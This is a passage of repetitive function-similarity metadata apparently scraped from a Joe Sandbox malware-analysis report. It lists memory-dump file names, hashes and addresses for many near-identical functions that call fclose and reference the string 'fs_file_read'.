Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304

Function 00007FF66EBA47A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA4771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304

Function 00007FF66EBA4767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304

Function 00007FF66EBA487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304

Function 00007FF66EBA4890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304

Function 00007FF66EBA4886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA4872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304

Function 00007FF66EBA4868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA4992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304

Function 00007FF66EBA4988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304

Function 00007FF66EBA499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA49A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304

Function 00007FF66EBA4B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304

Function 00007FF66EBA4B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
